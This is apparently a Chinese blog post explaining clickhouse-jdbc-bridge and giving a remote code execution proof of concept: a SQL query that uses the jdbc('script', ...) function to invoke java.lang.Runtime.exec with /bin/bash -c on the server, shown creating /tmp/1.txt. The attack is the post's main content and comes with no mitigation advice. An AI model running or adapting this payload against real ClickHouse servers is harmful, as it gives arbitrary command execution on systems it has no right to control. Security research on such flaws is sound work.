clickhouse-jdbc-bridge rce

azraelxuemo2024-07-14 9:16

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.

简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接

https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge

那么可以输入以下命令RCE

复制代码 
SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服务器端/tmp目录下看到1.txt

相关推荐
砚边数影27 分钟前
数据可视化入门:Matplotlib 基础语法与折线图绘制
数据库·信息可视化·matplotlib·数据可视化·kingbase·数据库平替用金仓·金仓数据库
orange_tt36 分钟前
Djiango配置Celery
数据库·sqlite
云小逸1 小时前
【nmap源码学习】 Nmap网络扫描工具深度解析:从基础参数到核心扫描逻辑
网络·数据库·学习
肉包_5112 小时前
两个数据库互锁,用全局变量互锁会偶发软件卡死
开发语言·数据库·c++
霖霖总总2 小时前
[小技巧64]深入解析 MySQL InnoDB 的 Checkpoint 机制:原理、类型与调优
数据库·mysql
此刻你3 小时前
常用的 SQL 语句
数据库·sql·oracle
それども3 小时前
分库分表的事务问题 - 怎么实现事务
java·数据库·mysql
·云扬·3 小时前
MySQL Binlog 配置指南与核心作用解析
数据库·mysql·adb
天空属于哈夫克34 小时前
Java 版:利用外部群 API 实现自动“技术开课”倒计时提醒
数据库·python·mysql
eWidget4 小时前
随机森林原理:集成学习思想 —— Java 实现多棵决策树投票机制
java·数据库·随机森林·集成学习·金仓数据库
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03Vue-skills的中文文档04让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南05Claude Code Skills 实用使用手册06UV安装并设置国内源07OpenClaw Chrome扩展使用教程 - 浏览器中继控制08一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示09Linux下V2Ray安装配置指南10AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南